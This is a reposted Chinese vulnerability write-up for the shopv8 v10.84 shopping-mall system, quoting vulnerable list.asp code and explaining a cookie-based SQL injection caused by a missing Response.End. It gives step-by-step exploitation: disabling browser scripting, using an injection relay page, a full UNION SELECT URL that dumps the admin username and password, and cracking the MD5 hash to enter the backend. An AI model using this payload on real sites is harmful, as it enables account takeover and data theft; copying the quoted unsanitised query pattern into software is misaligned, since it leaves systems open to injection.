【漏洞】shopv8 v10.84 商城系统注入漏洞

admin 2021年4月3日18:54:15评论1 views字数 3200阅读10分40秒阅读模式

转自:http://t00ls.net/thread-13776-1-1.html,作者:流浪的风,我仅做了排版、删减、与补充。

漏洞名称:shopv8 商城系统 v10.84 的注入漏洞

文章作者:流浪的风

作者Blog:http://www.st999.cn/blog

漏洞文件:list.asp

    邯郸学步,按图索骥,大家不要笑了。感谢闷豆,k4shifz,寒心冰剑……,几位黑阔的帮忙。

部分源码:

response.write("")
response.end
end if
dim id
id=request.QueryString("id")
if not isinteger(id) then
response.write""
end if%>

bookid=request.QueryString("id")
action=request.QueryString("action")
if action="save" then
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_pinglun",conn,1,3
rs.addnew
rs("bookid")=bookid
rs("pingji")=request("pingji")
rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))
rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))
rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))
rs("ip")=Request.servervariables("REMOTE_ADDR")
rs("pinglundate")=now()
rs("shenhe")=0
rs.update
rs.close
set rs=nothing
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shop_books where bookid="&bookid,conn,1,3
rs("pingji")=rs("pingji")+1
rs("pingjizong")=rs("pingjizong")+request("pingji")
rs.update
rs.close
set rs=nothing
response.Write ""
response.End
end if
%>


 


   


    

     


       


         

         


             
             
         
rs.open "select * from shop_books where bookid="&request("id"),conn,1,3
if rs.recordcount=0 then
%>

其中:

if not isinteger(id) then
response.write""

    没有以“Response.end”结束执行(Nuclear'Atk 补充:由于这样,只要禁止IE跳转就可以执行下一段代码了,这是个低级错误,可能程序员忘记写了),那么“request("id")”,我们也可以使用 cookies 给 id 赋值,那么注入就产生了。

    只要把IE的安全设置设到最高(Nuclear'Atk 补充:或者在安全设置-->自定义级别里把“活动脚本选项”,选择禁止即可),就可以阻止网页跳转到index.asp页面了。(不知道这里的这样分析对不对,请大家指点)

利用方法:

    一、先把安全设置设为最高(Nuclear'Atk 补充:或者在安全设置-->自定义级别里把“活动脚本选项”,选择禁止即可)。

把安全级别设置最高

禁止执行活动脚本

    二、在注入点:http://127.0.0.1:99/list.asp?id=322,直接用注入中转器生成个页面,爆用户名和密码,如图:

注入语句:

http://127.0.0.1:99/jmCook.asp?jmdcw=322%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,username,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53%20from%20admin

    三、在Md5查询的网站查出明文密码,然后进后台,做你要做的。

文章来源于lcx.cc:【漏洞】shopv8 v10.84 商城系统注入漏洞

相关推荐: 物理黑客:使用空气清新剂喷雾触发传感器来打开“安全”门!

视频: 借用空气清新剂从外部打开基于PIR Motion Sensor的“安全”门 用喷雾触发传感器来打开“安全”门 只能说samy实在是太机智了。。 再附上两篇有趣的议题,是大黑客samy在这次的defcon上讲的。 一个是借助signal jammer,来…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:54:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】shopv8 v10.84 商城系统注入漏洞https://cn-sec.com/archives/319125.html

发表评论

匿名网友 填写信息